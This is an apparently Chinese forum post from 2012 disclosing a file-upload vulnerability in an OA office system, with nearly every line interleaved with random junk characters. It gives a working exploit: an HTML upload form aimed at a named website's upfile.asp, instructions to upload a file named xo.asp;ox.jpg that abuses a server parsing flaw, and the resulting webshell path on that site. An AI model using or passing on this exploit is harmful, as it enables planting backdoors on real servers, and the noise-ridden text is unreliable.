全能OA办公系统 上传漏洞
$ T/ ` t: V$ {0 q. m, [/ {4 d$ p$ W# V; m' `
系统介绍:
# N5 @6 T. m# M
! y7 l) A0 Q) \1 K" H全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。" O7 L4 X$ \( {! ^+ J) s. d
4 G4 k4 S/ ?, i! ?
主要功能:
! C4 e0 x8 k9 f公司通告
, t7 I# H, ?% s* |工作计划
3 J8 Y' Q9 b% j8 g4 @2 a5 n- i通讯助理
4 M' A! t/ p5 ]! o# A; ?; r n% P客户资源 4 F7 v# n3 B( U
我的公文 ) y4 h+ D m8 s ?8 t0 D
公文传阅 ( ?7 k# K7 X; _6 U+ O; @% h+ f! T, t' s
公共资源
# E7 j" J+ Q: T; P资源预约 5 @5 }+ L7 T; q1 ]
今日考勤
' l8 o1 U4 X3 e4 @* l2 o个人计划
( Y9 G* L X5 N5 M7 E% S个人通讯录
! I0 R9 w' [* ]个人基本档案
' n8 ?2 r/ w$ \" _" S( U5 x未读邮件
+ l0 h8 g; @- J* Z$ L) T: u/ v% E发邮件 9 c2 P: |; y( `* C0 b' H% A
收件夹
2 t$ F5 K K8 C& k寄件夹 2 s" L; e: Q2 \6 q' Y0 M' q( `
网络硬盘
: p( J: c5 n/ s: I( c- t网络会议 ( e+ @( k" C5 ~, Z/ b N. M
网络调查
* p" G6 n* j r2 U; [交流论坛$ J) B3 H, J$ X/ z& ?6 ^2 A# p+ B
1 g% i* D3 |) C- k7 H有兴趣测试的朋友可以下源码看看& I# E2 O: c- m! a* v
: f# O* q( s& b, R; _源码下载:
) V! `* ?3 C& @, ]0 T( ], k6 `, h5 @6 i( p
http://www.mycodes.net/30/4750.htm
# n7 R; p' a* ~/ F5 ?0 a/ B2 d
) ?' j1 Y5 |1 ~8 V! |漏洞介绍:
2 }2 e( i8 |8 ^, Q5 i. u; d5 }6 g
% K1 q! p" q) H# ^由upfile.asp上传文件漏洞引起! K6 @ [ ?# A: M ]* h
) U3 Z O/ I( i# T" h
测试方法:6 o# ]% S* p: e* X
, b# c/ \$ W8 y2 C# ]使用名小子上传http://www.itlynn.com/upfile.asp即可
* v# I! o# Z7 n1 O
0 n- P7 I1 n: k4 u如果upfile.asp文件被删除不存在。0 z& {& V6 z& |! H$ S. c: A1 \; c. z
" ^/ y$ K" _" W1 X$ P2 D5 P 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
5 L2 g6 d7 N" x! R9 c
4 O- X2 I9 w" L. z( _如果存在那么将如下代码保存为upfile.html。& D6 [& @# Z5 I
$ x8 _5 v) F+ X" _# M) F; `然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。, a% A. r* p$ T8 i; F' A* T4 f) p" ~
/ M' }/ ?1 g+ F
' D& o2 u1 x. M h6 F
; H* Y6 r# S2 j |01 <table border='0' align="center" cellpadding="5"> 5 c8 a, x" Q# ~+ T1 k
8 |" m( T" w/ |; B8 k! |2 L2 k/ j02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> & T8 c' l1 o. u, ^: q: l2 t; z
7 q; G: I) ^) |! [4 v: W; o
03 <tr>
Q- P1 m) L/ ^: Y5 s+ g" T4 W
$ `4 Y( t8 A. m& D04 <td>报错:</td> 8 u3 N! \' r, T5 H) q- S
. K8 ?$ L( c7 {
05 <td><input type='radio' name='errnumber' value='0'>
" J3 U# Y# D) l/ `4 F, Y; b, a7 S2 f- ~. z8 d" p
06 自动更名 1 r: r8 v1 R$ Y) F9 v
2 P8 x" U" t" ^
07 <input type='radio' name='errnumber' value='1' checked> : f7 {% q: R" G& M
* G8 e; G p4 A0 P! F9 q/ Q
08 报错方式 3 i7 ]" |" n/ X. @. l
* `* U5 D7 ?$ U" K. Z
09 <input type='radio' name='errnumber' value='2'> & t: l; B; ^& B. p% E8 P- g5 B2 |
2 v; C, m' M2 t10 直接覆盖</td> / f2 y# D. ~3 a7 q3 [( }; m
4 y* I' `5 a" }/ Z8 U11 </tr> 8 {4 e6 s3 g3 x7 H; g/ n
7 \% w& F [7 K9 n) r12 <tr> 9 V" ~5 A9 K" {& A
1 s& l6 o; Z; i! @) d2 E
13 <td>主题:</td>
+ g5 T! o. W3 i! s0 Q1 o7 R
/ o7 B" K3 d9 }. A p14 <td><input type='text' name='filename' size='30'></td> ( {- P: X2 d. O! H$ Z W& W& U
# L" x( {7 q' q# n8 Z15 </tr> f+ Z$ C @/ S4 P
0 S$ {/ j* ~/ {, `# p6 o# J( a6 J
16 <tr> 5 L" W" F; N; \, N7 Y
3 b% c! D6 K9 }; \9 ^ o) q
17 <td>文件:</td>
. n) ]4 m6 N8 O# ] v# r
. M/ v% [- K1 B& [! ]18 <td><input type="file"name="fruit"size="30"></td> 3 e! t$ N7 x- _9 N) D
3 Y. I: N" k& t- {0 X8 w* `% K19 </tr> : o- m4 s) v7 U& m
( F' s5 O1 W3 z, [7 k
20 <tr>
5 A" {& |, e! R9 }, T2 O. T2 N) M* j; L! F. b x
21 <td valign='top'>简介:</td>
- Q: C" _( r/ q: h @
$ _: c. i# e5 Y5 k. ~" e2 V5 P22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
( n& D6 y0 f5 y8 p! R& p( u" A6 o
23 </tr>
. l2 a% b* ]! T2 d8 f/ i7 x
6 l: v* f& C5 Z% m& o24 9 d& G, n0 K* N
/ }1 r7 }# _; j' M' e# }0 t4 f6 I
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
+ N' V% s: j/ ] O8 ~' [/ e* i; |4 d# t; T% Q5 _: [
26 </tr> 3 w ?$ ?8 M& Q# B$ Y$ O# {
# d- ~& E* I# J1 g" O/ r9 o* B
27 </form>
8 l: ]# _2 {8 J$ t) P
8 O9 k7 m9 h W, }& ~然后打开上传一个文件名为xo.asp;ox.jpg的文件。
6 ~; V9 A* w1 ^% c" t( |& b' f. w4 K1 T/ P& T1 ^
! W$ Z- E5 X( q8 c, ~2 b. n0 t
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg3 I5 R' m6 z4 q1 @& l( d
6 s' ^, Z7 k5 X5 n. T此漏洞需要配合解析漏洞利用。
6 C8 I( g" i1 }( c
9 g( \! [* d% h |
发表于 2012-11-21 13:45:12
收藏
支持
反对